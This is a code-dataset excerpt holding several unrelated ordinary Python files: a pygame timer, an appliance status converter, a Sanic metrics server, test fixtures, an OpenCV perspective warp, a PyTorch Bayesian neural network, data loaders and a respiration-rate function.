main()","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":25735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"539919786","text":"import pygame\nimport time;\nimport math;\nfrom Color import Color\n#########################################################\n# Orlige gere le temps et son affichage #\n#Entre; Temps d'affichage #\n#Sortie: Null #\n#########################################################\n\nclass Orloge:\n\n def __init__(self,T,pos,pos_lenght):\n\n self.timeLeft=T\n self.totalTime=T\n self.currentTime=time.time()\n self.rect = pygame.Rect(pos[0], pos[1], pos_lenght, 30)\n self.color = pygame.Color(Color[\"color11\"][0], Color[\"color11\"][1], Color[\"color11\"][2])\n self.rect_back = pygame.Rect(pos[0], pos[1], pos_lenght, 30)\n self.color_back = pygame.Color(Color[\"dark blue\"][0], Color[\"dark blue\"][1], Color[\"dark blue\"][2])\n\n self.lenght = pos_lenght\n\n self.pos=pos\n self.dt=0\n\n\n\n def update(self, fenetre, ratings):\n self.dt=time.time()-self.currentTime\n self.timeLeft=self.totalTime-self.dt\n if self.timeLeft<0:\n self.timeLeft=0\n self.display(fenetre, ratings)\n\n\n def display(self, fenetre, ratings):\n p= self.timeLeft/self.totalTime\n\n if p*100 == ratings.very_good:\n self.color = pygame.Color(Color[\"color8\"][0], Color[\"color8\"][1], Color[\"color8\"][2])\n if p*100 == ratings.good:\n self.color = pygame.Color(Color[\"orange\"][0], Color[\"orange\"][1], Color[\"orange\"][2])\n if p*100 == ratings.not_good:\n self.color = pygame.Color(Color[\"dark orange\"][0], Color[\"dark orange\"][1], Color[\"dark orange\"][2])\n if p*100 == ratings.bad:\n self.color = pygame.Color(Color[\"dark pink\"][0], Color[\"dark pink\"][1], Color[\"dark pink\"][2])\n\n self.rect_back[2] = self.lenght * (1-p)\n pygame.draw.rect(fenetre, self.color, self.rect, 0)\n pygame.draw.rect(fenetre, self.color, self.rect, 5)\n if self.rect_back[2] > 0:\n pygame.draw.rect(fenetre, self.color_back, self.rect_back, 0)\n font = pygame.font.Font(\"data/freesansbold.ttf\",17)\n\n # display the time left\n hour = int(self.timeLeft / 3600);\n min = int(self.timeLeft / 60 - (hour * 3600));\n sec = int(self.timeLeft - (min * 60) - (hour * 3600))\n\n text = font.render('Time left: ',1,(Color[\"yellow\"][0], Color[\"yellow\"][1], Color[\"yellow\"][2]))\n fenetre.blit(text,(self.pos[0]-280,self.pos[1]+ 5))\n\n text = font.render(str(hour) + ':' + str(min) + ':' + str(sec),1,(Color[\"white\"][0], Color[\"white\"][1], Color[\"white\"][2]))\n fenetre.blit(text,(self.pos[0]-85,self.pos[1]+ 5))\n","sub_path":"src/Orloge.py","file_name":"Orloge.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434651565","text":"from ..abstract import ErdReadOnlyConverter\nfrom ..primitives import *\nfrom gehomesdk.erd.values.fridge import FridgeDoorStatus, ErdDoorStatus\n\nclass FridgeDoorStatusConverter(ErdReadOnlyConverter[FridgeDoorStatus]):\n def erd_decode(self, value: str) -> FridgeDoorStatus:\n def get_door_status(val: str) -> ErdDoorStatus:\n try:\n return ErdDoorStatus(val)\n except ValueError:\n return ErdDoorStatus.NA\n\n fridge_right = get_door_status(value[:2])\n fridge_left = get_door_status(value[2:4])\n freezer = get_door_status(value[4:6])\n drawer = get_door_status(value[6:8])\n if (fridge_right != ErdDoorStatus.OPEN) and (fridge_left != ErdDoorStatus.OPEN):\n if freezer == ErdDoorStatus.OPEN:\n status = \"Freezer Open\"\n else:\n status = \"Closed\"\n elif freezer == ErdDoorStatus.OPEN:\n status = \"All Open\"\n else:\n status = \"Fridge Open\"\n return FridgeDoorStatus(\n fridge_right=fridge_right,\n fridge_left=fridge_left,\n freezer=freezer,\n drawer=drawer,\n status=status,\n )\n","sub_path":"gehomesdk/erd/converters/fridge/fridge_door_status_converter.py","file_name":"fridge_door_status_converter.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274307506","text":"import asyncio\nfrom sanic import Sanic\nfrom sanic.response import json, text\nimport os\nimport sqlite3\nimport numpy as np\nimport pandas as pd\nimport math\nfrom utils import u, b\nimport redis\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\n\nrds = redis.StrictRedis()\n\nDATA_DIR = b'./data'\nDB_DIR = b'./db'\n\nfile_handles = {}\n\nINDEX_DB = b'/'.join([DB_DIR, b'index.db'])\n\ndb_conn = sqlite3.connect(INDEX_DB.decode())\n\ndef prepare_db():\n c = db_conn.cursor()\n try:\n c.execute('''CREATE TABLE metrics(name text, last_ts int, last_val real)''')\n c.execute('''CREATE TABLE metric_props(metric_name text, name text, value text)''')\n c.execute('''CREATE TABLE metrics_files(metric_name text, min_ts int, max_ts int, file_path text)''')\n except:\n # TODO: check metrics already exists\n pass\n db_conn.commit()\n\nprepare_db()\n\napp = Sanic()\n\ndef update_db_index(metric_name, ts, val, file_path):\n c = db_conn.cursor()\n c.execute(\"select name from metrics where name=?\", (metric_name,) )\n row = c.fetchone()\n if not row:\n c.execute('''\n insert into metrics(name, last_ts, last_val)\n values (?, ?, ?)\n ''', (metric_name, ts, val))\n else:\n # update maybe\n pass\n\n c.execute('select metric_name from metrics_files where metric_name=? and file_path=?', (metric_name, file_path))\n row = c.fetchone()\n if not row:\n c.execute('''\n insert into metrics_files(metric_name, file_path)\n values (?, ?)\n ''', (metric_name, file_path))\n\n db_conn.commit()\n\n@app.route(\"/\")\nasync def main(request):\n return text(\"ok\")\n\ndef prepare_dirs(metric_name, customer=b'customer_1'):\n dir = b'/'.join([DATA_DIR, customer, b(metric_name).replace(b'.', b'/')])\n if not os.path.exists(dir):\n os.makedirs(dir, exist_ok=True)\n return dir\n\ndef get_fhandle(fname):\n if file_handles.get(fname):\n return file_handles.get(fname)\n file_handles[fname] = open(fname, 'a+')\n print(\"new file handle -\", fname)\n return file_handles[fname]\n\ncnt = 0\n\ndef save_record(metric_name, ts, val):\n global cnt\n dir = prepare_dirs(metric_name)\n hour_ts = math.floor(ts/3600)*3600\n fname = os.path.join(u(dir), u(hour_ts))\n fname = '{}.csv'.format(u(fname))\n fhandle = get_fhandle(fname)\n fhandle.write(','.join(u([ts, val])))\n fhandle.write('\\n')\n\n rds.lpush('metrics_queue', ','.join(u([metric_name, ts, val])))\n\n #\n # update_db_index(metric_name, ts, val, fname)\n\ndef process_line(ln):\n if not ln:\n return\n vals = [v.strip() for v in ln.split(b',')]\n if len(vals) < 3:\n return\n metric_name, ts, val = vals[0:3]\n # print(metric_name, ts, val)\n save_record(metric_name, float(ts), val)\n\n@app.route(\"/metrics\", methods=['POST'])\nasync def metrics(request):\n try:\n lines = request.body.split(b'\\n')\n for ln in lines:\n process_line(ln)\n except:\n raise\n # return text('-err')\n return text(\"+ok\")\n\n\n@app.route('/collectd-post', methods=['POST'])\nasync def collectd_post(request):\n import json as jsn\n data = jsn.loads(request.body)\n for ln in data:\n ts = ln['time']\n\n m = []\n for k in ('host', 'plugin', 'plugin_instance', 'plugin_type', 'type_instance'):\n tv = ln.get(k, '')\n if tv:\n m.append(tv)\n\n for t in zip(ln['dstypes'], ln['dsnames'], ln['values']):\n metric_name = '.'.join(m + list(t[0:2]))\n v = t[-1]\n if 'cpu.' in metric_name:\n print(ln)\n save_record(metric_name.encode(), ts, v)\n\n return text(\"+ok\\r\\n\")\n\n# these are for mimicking prometheus api\n@app.route('/api/v1/label//values')\nasync def api_name(request, name):\n\n if name == '__name__':\n c = db_conn.cursor()\n c.execute('''\n select name from metrics order by name\n ''')\n\n names = [row[0] for row in c.fetchall()]\n return json({\n \"status\" : \"success\",\n \"data\" : names\n })\n\n return text('-err:Unsupported')\n\ndef int_or_none(i):\n if i is None:\n return i\n return int(i)\n\nfrom sanic.exceptions import SanicException\n\nclass NotAuthenticated(SanicException):\n status_code = 401\n\nclass NotAllowed(SanicException):\n status_code = 403\n\nimport base64\n\ndef auth(request, authenticator):\n auths = request.headers.get('authorization', '')\n if not auths:\n raise NotAuthenticated('not authenticated')\n\n t = auths.split('Basic ')[1]\n decoded = base64.b64decode(t)\n user, passwd = decoded.split(b':')\n authenticated = authenticator(user, passwd)\n if not authenticated:\n raise NotAllowed('credentials wrong, or not allowed')\n\n return user, passwd\n\n@app.route('/api/v1/query_range')\nasync def query_range(request):\n from cli import load_files\n auth(request, authenticator=lambda u, p: True)\n\n start = int(request.args.get('start', 0))\n end = int_or_none(request.args.get('end', None))\n metric_name = request.args['query'][0].encode()\n ds = load_files(metric_name, ts_start=start, ts_end=end)\n\n # print(request.args)\n if ds is None:\n vals = []\n else:\n # resample now.\n step = request.args.get('step', None)\n if step:\n ds = ds.resample('{}s'.format(step)).mean()\n\n # convert to epoch\n ds.index = ds.index.astype(np.int64) // 10 ** 9\n\n vals = []\n for i, v in ds.itertuples():\n vals.append((float(i), float(v)))\n\n return json({\n \"status\" : \"success\",\n \"data\" : {\n \"resultType\" : \"matrix\",\n \"result\" : [\n {\n \"metric\" : {\n \"__name__\" : metric_name,\n },\n \"values\" : vals\n }\n ]\n }\n })\n\n@asyncio.coroutine\ndef periodic(app, loop):\n while True:\n for k, f in file_handles.items():\n f.flush()\n yield from asyncio.sleep(3)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8001, debug=False, after_start=periodic)\n\n\n\"\"\"\ncurl -v -X POST --data-binary @post_values.txt http://localhost:8001/metrics/\n\"\"\"","sub_path":"old_app.py","file_name":"old_app.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"365026154","text":"\"\"\"Fixtures for HERE Travel Time tests.\"\"\"\nimport json\nfrom unittest.mock import patch\n\nfrom herepy.models import RoutingResponse\nimport pytest\n\nfrom tests.common import load_fixture\n\nRESPONSE = RoutingResponse.new_from_jsondict(\n json.loads(load_fixture(\"here_travel_time/car_response.json\"))\n)\nRESPONSE.route_short = \"US-29 - K St NW; US-29 - Whitehurst Fwy; I-495 N - Capital Beltway; MD-187 S - Old Georgetown Rd\"\n\nEMPTY_ATTRIBUTION_RESPONSE = RoutingResponse.new_from_jsondict(\n json.loads(load_fixture(\"here_travel_time/empty_attribution_response.json\"))\n)\nEMPTY_ATTRIBUTION_RESPONSE.route_short = \"US-29 - K St NW; US-29 - Whitehurst Fwy; I-495 N - Capital Beltway; MD-187 S - Old Georgetown Rd\"\n\n\n@pytest.fixture(name=\"valid_response\")\ndef valid_response_fixture():\n \"\"\"Return valid api response.\"\"\"\n with patch(\n \"herepy.RoutingApi.public_transport_timetable\",\n return_value=RESPONSE,\n ) as mock:\n yield mock\n\n\n@pytest.fixture(name=\"empty_attribution_response\")\ndef empty_attribution_response_fixture():\n \"\"\"Return valid api response with an empty attribution.\"\"\"\n with patch(\n \"herepy.RoutingApi.public_transport_timetable\",\n return_value=EMPTY_ATTRIBUTION_RESPONSE,\n ) as mock:\n yield mock\n","sub_path":"tests/components/here_travel_time/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545265449","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"resource/cards.jpg\")\n\nwidth, height = 250, 350\t#output size\npts1 = np.float32([[457,100], [600,160], [352,280], [525,370]]) #point of object edge\npts2 = np.float32([[0,0], [width,0], [0, height], [width,height]]) #new point object\nmatrix = cv2.getPerspectiveTransform(pts1, pts2)\nimgOutput = cv2.warpPerspective(img, matrix, (width, height))\n\ncv2.imshow(\"Image\", img)\ncv2.imshow(\"Output\", imgOutput)\ncv2.waitKey(0)","sub_path":"5-wrap-prespective.py","file_name":"5-wrap-prespective.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362409719","text":"import pdb\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\n\n# NN utility function\n\ndef get_layer_sizes_from_arch(arch):\n \"\"\"get layer_sizes from architechture layer sizes description\"\"\"\n \n layer_sizes = [[m,n] for m,n in zip(arch[:-1], arch[1:])]\n \n return layer_sizes \n\ndef get_num_weights_from_arch(arch):\n\n layer_sizes = get_layer_sizes_from_arch(arch)\n\n num_weights = sum((m+1)*n for m,n in layer_sizes)\n\n return num_weights\n\n\n# simple bnn to sample from, includes the fact that each want to have sample outputs & weights\n\nclass BNN():\n\n def __init__(self, arch, mean, log_std):\n self.layer_sizes = get_layer_sizes_from_arch(arch)\n \n self.params = (mean, log_std)\n\n def sample_weights(self, N_samples):\n mean, log_std = self.params\n \n epsilons = torch.randn(N_samples, mean.shape[0]) \n log_std_expanded = log_std.expand(N_samples, *log_std.shape)\n mean_expanded = mean.expand(N_samples, *mean.shape)\n\n return epsilons*log_std_expanded.exp() + mean_expanded\n\n def unpack_layers(self, weights):\n n_samples = len(weights)\n\n for m,n in self.layer_sizes:\n yield weights[:, :m*n].reshape((n_samples, m, n)), \\\n weights[:, m*n : m*n + n].reshape(n_samples, 1, n)\n\n weights = weights[:, (m+1) * n:]\n\n def reshape_weights(self, weights):\n layer_weights = list(self.unpack_layers(weights))\n\n return layer_weights\n\n def bnn_predict(self, weights, inputs, act):\n\n #inputs = inputs[None, :, :] # [1, N, D]\n weights = self.reshape_weights(weights)\n\n for W,b in weights:\n #outputs = torch.Tensor(np.einsum('mnd,mdo->mno', inputs, W)) + b\n \n if len(inputs.shape) == 2:\n num_weight_samples = W.shape[0]\n inputs = inputs.expand(num_weight_samples, *inputs.shape)\n\n #pdb.set_trace()\n \n outputs = inputs.bmm(W) + b\n inputs = act(outputs)\n\n return outputs \n\n\n def sample_bnn(self, x, N_samples, act = F.tanh):\n bnn_weights = self.sample_weights(N_samples)\n\n f_bnn = self.bnn_predict(bnn_weights, x, act)[:, :, 0]\n\n return f_bnn, bnn_weights\n\n\n\n# bnn_wrapper with mean & std parameters to optimize\n\nclass BNN_wrapper(nn.Module):\n\n def __init__(self, arch):\n super(BNN_wrapper, self).__init__()\n\n # initialize posterior parameters\n self.num_weight_samples = get_num_weights_from_arch(arch)\n self.mean = nn.Parameter(torch.randn(self.num_weight_samples))\n #self.log_std = nn.Parameter(torch.zeros(self.num_weight_samples))\n self.log_std = nn.Parameter(torch.ones(self.num_weight_samples) * -5)\n\n def forward(self, inputs, N_samples, act=F.relu):\n bnn_func = BNN(arch, self.mean, self.log_std)\n\n outputs, sampled_weights = bnn_func.sample_bnn(inputs, N_samples, act)\n\n return outputs, sampled_weights\n\n\n# simple vlb_objective like in Daniel's file\n\ndef gaussian_entropy(log_std):\n return 0.5 * log_std.shape[0] * (1.0 + np.log(2*np.pi)) + log_std.sum()\n\ndef diag_gausian_log_density(x, mu, log_std):\n n = x.shape[0]\n\n #batch_size = mu.shape[0]\n #x_expanded = x.expand(batch_size, *x.shape)\n \n std = np.exp(log_std)\n\n #pdb.set_trace()\n\n return -0.5*n*(np.log(2*np.pi) + log_std) - ((x - mu)**2/(2* (std**2))).sum(dim=1)\n\ndef vlb_objective(params, y, mu_y, sample_weights):\n mean, log_std = params\n \n entropy = gaussian_entropy(log_std)\n\n log_likelihood = diag_gausian_log_density(y.t(), mu_y, 0.1)\n log_prior = diag_gausian_log_density(sample_weights, 0, 1)\n\n return - entropy - (log_likelihood + log_prior).mean()\n\n\n# Train & Test Utilities\n\ndef plot_update(ax, params, inputs, targets, N_samples, arch):\n\n # get data to plot\n plot_inputs = torch.Tensor(np.linspace(-8,8, num=400)).view(-1,1)\n \n mean, log_std = params\n bnn_func = BNN(arch, mean, log_std)\n \n outputs, _ = bnn_func.sample_bnn(plot_inputs, N_samples)\n \n # Numpy versions of data to plot\n inputs_numpy = inputs.detach().numpy()\n output_means = outputs.mean(0).detach().numpy()\n plot_inputs_numpy = plot_inputs.detach().numpy()\n\n # plot data\n plt.cla()\n ax.plot(inputs_numpy, targets.numpy(), 'k.')\n ax.plot(plot_inputs_numpy, output_means, color='r')\n ax.set_ylim([-5,5])\n plt.draw()\n plt.pause(1.0/60.0)\n\n# train & test functions\n\ndef train(model, n_data, batch_size, num_mc_weight_samples=10, n_iter=100):\n model.train()\n\n params = (model.mean, model.log_std)\n inputs, targets = sample_data(n_data)\n\n batch_size = 3\n\n fig = plt.figure(facecolor='white')\n ax = fig.add_subplot(111)\n plt.ion()\n plt.show(block=False)\n\n for i in range(0, n_data, batch_size):\n input_ = inputs[i:i+batch_size]\n target = targets[i:i+batch_size]\n \n #for ii in range(n_iter):\n # input_ = inputs\n # target = targets\n\n #optimizer.zero_grad()\n\n outputs, sample_weights = model.forward(input_, num_mc_weight_samples)\n train_loss = vlb_objective(params, target, outputs, sample_weights)\n\n print('parameters at iteration')\n print([p.sum().item() for p in model.parameters()])\n\n train_loss.backward()\n optimizer.step()\n\n print('train_loss', train_loss.item()) # why take -?\n print('mean', model.mean.mean().item())\n print('log_std', model.log_std.mean().item())\n\n plot_update(ax, params, inputs, targets, num_mc_weight_samples, arch)\n\ndef test(model, n_data=20, num_mc_weight_samples = 10):\n model.eval()\n\n with torch.no_grad():\n inputs, targets = sample_data(n_data)\n outputs, sampled_weights = model.forward(inputs, num_mc_weight_samples)\n\n test_loss = ((outputs.mean(0) - targets)**2).mean()\n\n print('test_loss', test_loss.item())\n\n\n\n# data loader functions\n\ndef build_toy_dataset(n_data=80, noise_std=0.1):\n #rs = npr.RandomState(0)\n inputs\t= np.concatenate([np.linspace(0, 3, num=n_data/2),\t \n np.linspace(6, 8, num=n_data/2)])\n targets = np.cos(inputs) + torch.randn(n_data) * noise_std\n inputs = (inputs - 4.0) / 2.0\n inputs\t= inputs[:, np.newaxis]\n targets = targets[:, np.newaxis] / 2.0\n return inputs, targets\n\ndef sample_data(n_data=20, noise_std=0.1, context_size=3):\n #rs = npr.RandomState(0)\n\n inputs\t= torch.Tensor(np.linspace(-1.2,1.2,n_data))\n targets = inputs**3 + torch.randn(n_data) * noise_std\n return inputs[:, None], targets[:, None]\n\n\n# main functions\n\nif __name__ == '__main__':\n torch.manual_seed(0)\n\n device = torch.device('cpu')\n\n arch = [1,20,20,1]\n\n # get the model instance\n model = BNN_wrapper(arch).to(device)\n optimizer = optim.Adam(model.parameters(), lr=0.01)\n\n n_data = 1000\n batch_size = 20\n train(model, n_data, batch_size)\n test(model)\n\n # Test\n \n #num_weights = get_num_weights_from_arch(arch)\n #mean = torch.zeros(num_weights)\n #log_std = torch.ones(num_weights)\n #bnn_func = BNN(arch, mean, log_std)\n\n inputs, targets = sample_data(20)\n N_samples = 2\n\n #bnn_func.sample_bnn(inputs, N_samples)\n\n #bnn = BNN_wrapper(arch)\n \n #params = (bnn.mean, bnn.log_std)\n #outputs, weights = bnn.forward(inputs, N_samples)\n\n #loss = vlb_objective(params, targets, outputs, weights)\n\n pdb.set_trace()\n","sub_path":"ml/weight_uncertainty_in_nns/bnn_daniel_pytorch_v2.py","file_name":"bnn_daniel_pytorch_v2.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"409917917","text":"n=int(input())\narray=[[0 for i in range(n)] for j in range(n)]\nfor i in range(n):\n for j in range(n):\n array[i][j]=int(input())\nantiSimetrica=bool(True) \nfor i in range(n):\n for j in range(n):\n if(int(array[i][j]+array[j][i])!=0):\n antiSimetrica=False\n#Matriz antissimétrica:https://pt.wikipedia.org/wiki/Matriz_antissim%C3%A9trica \nif(simetrica):\n print(\"É antissimétrica!\")\nelse:\n print(\"Não é antissimétrica!\")","sub_path":"Programação/Lista_7/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"322489537","text":"import unittest\n\nfrom paste_printer.command.command import Command\nfrom paste_printer.command.command_executor import Command_Executor\nfrom test_paste_printer.util.temp_file_handler import Temp_File_Handler\n\n\nclass TestCommandExecutor(unittest.TestCase):\n\n def setUp(self):\n self.test_file_handler = Temp_File_Handler()\n self.path_to_file = self.test_file_handler.test_gcode\n\n def tearDown(self):\n self.test_file_handler.delete_all_temp_files()\n\n def execute_command(self, command: Command):\n command_executor = Command_Executor(command)\n return command_executor.execute()\n\n def test_command_1(self):\n additional_information_bol = True\n pause_each_layer_bol = True\n retract_syringe_bol = True\n pause_each_layer_par_2 = True\n\n self.test_command_1 = Command(path_to_file=self.path_to_file,\n flow_rate_layer_0 = \"100\",\n flow_rate_par_1 = \"100\",\n flow_rate_differentiate_bol = True,\n bed_temperature=\"0\",\n print_speed=\"100\",\n fan_bol=True,\n additional_information_bol=additional_information_bol,\n pause_each_layer_bol=pause_each_layer_bol,\n clean_nozzle_bol=True,\n retract_syringe_bol=retract_syringe_bol,\n file_name=\"test\",\n storage_path=self.test_file_handler.temp_files,\n pause_each_layer_par_1=10,\n pause_each_layer_par_2=pause_each_layer_par_2,\n clean_nozzle_par_1=50)\n\n self.execute_command(self.test_command_1)\n\n def test_command_2(self):\n additional_information_bol = True\n pause_each_layer_bol = False\n retract_syringe_bol = True\n pause_each_layer_par_2 = True\n\n self.test_command_1 = Command(path_to_file=self.path_to_file,\n flow_rate_layer_0=\"100\",\n flow_rate_par_1=\"100\",\n flow_rate_differentiate_bol=True,\n bed_temperature=\"0\",\n print_speed=\"100\",\n fan_bol=True,\n additional_information_bol=additional_information_bol,\n pause_each_layer_bol=pause_each_layer_bol,\n clean_nozzle_bol=True,\n retract_syringe_bol=retract_syringe_bol,\n file_name=\"test\",\n storage_path=self.test_file_handler.temp_files,\n pause_each_layer_par_1=10,\n pause_each_layer_par_2=pause_each_layer_par_2,\n clean_nozzle_par_1=50)\n\n result_gcode = self.execute_command(self.test_command_1)\n\n","sub_path":"src/test_paste_printer/command/test_command_executor.py","file_name":"test_command_executor.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278462211","text":"import media\nimport fresh_tomatoes\nimport json\n\n\ndef get_movies():\n \"\"\" Parse Json \"movies.txt\" file to get the movies.\n Returns\n -------\n array\n Movies Collection\n \"\"\"\n movies = []\n json_movies = json.load(open('movies.txt'))\n for json_movie in json_movies:\n movies.append(media.Movie(\n json_movie['movie_title'],\n json_movie['movie_storyline'],\n json_movie['poster_image'],\n json_movie['trailer_youtube'])\n )\n return movies\n\n# Create .html file with the movies array.\nfresh_tomatoes.open_movies_page(get_movies())\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"42127405","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\n\nfrom ..signal import signal_interpolate\nfrom ..signal import signal_smooth\n\ndef rsp_rate(peaks, troughs=None, sampling_rate=1000, desired_length=None, method=\"khodadad2018\"):\n \"\"\"Calculate respiration (RSP) rate.\n\n Calculate respiration rate and amplitude.\n\n Parameters\n ----------\n peaks : list, array, DataFrame, Series or dict\n The samples at which the inhalation peaks occur. If a dict or a\n DataFrame is passed, it is assumed that these containers were obtained\n with `rsp_findpeaks()`.\n troughs : list, array, or Series\n The samples at which the exhalation troughs occur. Can be passed in\n individually, or is automatically inferred if peaks is a dict or\n DataFrame obtained with `rsp_findpeaks()`.\n sampling_rate : int\n The sampling frequency of the signal that contains the peaks and\n troughs (in Hz, i.e., samples/second).\n desired_length : int\n By default, the returned respiration rate, period, and amplitude each\n have the same number of elements as peaks. If set to an integer, each\n of the returned elements will be interpolated between peaks over\n desired_length samples. Has not effect if a DataFrame is passed in as\n the peaks argument.\n method : str\n The processing pipeline to apply. Can be one of 'khodadad2018' or 'biosppy'.\n\n Returns\n -------\n signals : DataFrame\n A DataFrame containing respiration rate, and amplitude,\n accessible with the keys 'RSP_Rate' and 'RSP_Amplitude'\n respectively.\n\n See Also\n --------\n rsp_clean, rsp_findpeaks, rsp_process, rsp_plot\n\n Examples\n --------\n >>> import numpy as np\n >>> import pandas as pd\n >>> import neurokit2 as nk\n >>>\n >>> rsp = np.cos(np.linspace(start=0, stop=50, num=10000))\n >>> signals, info = nk.rsp_findpeaks(rsp)\n >>>\n >>> data = nk.rsp_rate(signals)\n >>> data[\"RSP_Signal\"] = rsp # Add the signal back\n >>> nk.standardize(data).plot()\n \"\"\"\n if isinstance(peaks, dict):\n troughs = peaks[\"RSP_Troughs\"]\n peaks = peaks[\"RSP_Peaks\"]\n elif isinstance(peaks, pd.DataFrame):\n desired_length = len(peaks[\"RSP_Peaks\"])\n troughs = np.where(peaks[\"RSP_Troughs\"] == 1)[0]\n peaks = np.where(peaks[\"RSP_Peaks\"] == 1)[0]\n\n # Find length of final signal to return\n if desired_length is None:\n desired_length = len(peaks)\n\n\n # Sanity checks\n if len(peaks) <= 3:\n print(\"NeuroKit warning: rsp_rate(): too little peaks detected to \"\n \"compute the rate. Returning empty variable(s).\")\n if troughs is not None:\n return pd.DataFrame({\"RSP_Rate\": np.full(desired_length, np.nan),\n \"RSP_Amplitude\": np.full(desired_length, np.nan)})\n else:\n return pd.DataFrame({\"RSP_Rate\": np.full(desired_length, np.nan)})\n\n # Calculate period in msec, based on horizontal peak to peak\n # difference and make sure that rate has the same number of elements as\n # peaks (important for interpolation later) by prepending the mean of\n # all periods\n period = np.ediff1d(peaks, to_begin=0) / sampling_rate\n period[0] = np.mean(period)\n\n # Get rate\n rate = 60 / period\n\n if method.lower() == \"biosppy\":\n rate, peaks, troughs = _rsp_rate_outliers(rate, peaks,\n troughs=troughs,\n threshold_absolute=35)\n\n # Smooth with moving average\n rate = signal_smooth(signal=rate, kernel='boxcar', size=3)\n\n # Interpolate all statistics to length of the breathing signal\n rate = signal_interpolate(rate,\n x_axis=peaks,\n desired_length=desired_length)\n\n # Prepare output\n out = {\"RSP_Rate\": rate}\n\n # Add amplitude if troughs are available\n if troughs is not None:\n # TODO: normalize amplitude?\n amplitude = peaks - troughs\n out[\"RSP_Amplitude\"] = signal_interpolate(amplitude,\n x_axis=peaks,\n desired_length=desired_length)\n\n signals = pd.DataFrame.from_dict(out)\n return(signals)\n\n\n\n\n\n# =============================================================================\n# Internals\n# =============================================================================\ndef _rsp_rate_outliers(rate, peaks, troughs=None, threshold_absolute=35):\n\n if threshold_absolute is None:\n return rate, peaks, troughs\n\n # physiological limits\n keep = np.nonzero(rate <= threshold_absolute)\n\n if troughs is not None:\n return rate[keep], peaks[keep], troughs[keep]\n else:\n return rate[keep], peaks[keep], None\n","sub_path":"neurokit2/rsp/rsp_rate.py","file_name":"rsp_rate.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"99851648","text":"import os.path\nimport numpy as np\nimport torch.utils.data as data\nimport scipy.io\nfrom utils import data_augmentation\nimport torch\n\ndef is_mat_file(filename):\n return any(filename.endswith(extension) for extension in [\".mat\"])\n\n\nclass loadingData(data.Dataset):\n \"\"\"\n Read Hyper-spectral images and RGB images pairs,\n The pair is ensured by 'sorted' function, so please check name convention.\n \"\"\"\n def __init__(self, image_dir, augment=None, total_num=int):\n super(loadingData, self).__init__()\n self.image_folders = os.listdir(image_dir)\n self.image_files = []\n for i in self.image_folders:\n if is_mat_file(i) and len(self.image_files) <= total_num:\n full_path = os.path.join(image_dir, i)\n self.image_files.append(full_path)\n self.augment = augment\n if self.augment:\n self.factor = 8\n else:\n self.factor = 1\n\n def __getitem__(self, index):\n file_index = index\n aug_num = 0\n if self.augment:\n file_index = index // self.factor\n aug_num = int(index % self.factor)\n load_dir = self.image_files[file_index]\n data = scipy.io.loadmat(load_dir)\n ms = np.array(data['ms'], dtype=np.float32)\n lms = np.array(data['ms_bicubic'], dtype=np.float32)\n gt = np.array(data['gt'], dtype=np.float32)\n ms, lms, gt = data_augmentation(ms, mode=aug_num), data_augmentation(lms, mode=aug_num), data_augmentation(gt, mode=aug_num)\n ms = torch.from_numpy(ms.copy()).permute(2, 0, 1)\n lms = torch.from_numpy(lms.copy()).permute(2, 0, 1)\n gt = torch.from_numpy(gt.copy()).permute(2, 0, 1)\n\n return ms, lms, gt\n\n def __len__(self):\n return len(self.image_files)*self.factor\n\n\n","sub_path":"data/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263375129","text":"\n\n# # Leaflet cluster map of talk locations\n#\n# (c) 2016-2017 R. Stuart Geiger, released under the MIT license\n#\n# Run this from the _talks/ directory, which contains .md files of all your talks. \n# This scrapes the location YAML field from each .md file, geolocates it with\n# geopy/Nominatim, and uses the getorg library to output data, HTML,\n# and Javascript for a standalone cluster map.\n#\n# Requires: glob, getorg, geopy\n\nimport glob\nimport getorg\nfrom geopy import Nominatim\n\ng = glob.glob(\"*.md\")\n\n\ngeocoder = Nominatim()\nlocation_dict = {}\nlocation = \"\"\npermalink = \"\"\ntitle = \"\"\n\n\nfor file in g:\n with open(file, 'r') as f:\n lines = f.read()\n \n doublequote = False\n singlequote = False\n if lines.find('location: \"') > 1:\n doublequote = True\n elif lines.find('location: \\'') > 1:\n singlequote = True\n \n if doublequote == True:\n searchstring = 'location: \"'\n endstring = '\"'\n elif singlequote == True:\n searchstring = 'location: \\''\n endstring = '\\''\n \n if singlequote == True or doublequote == True:\n loc_start = lines.find(searchstring) + 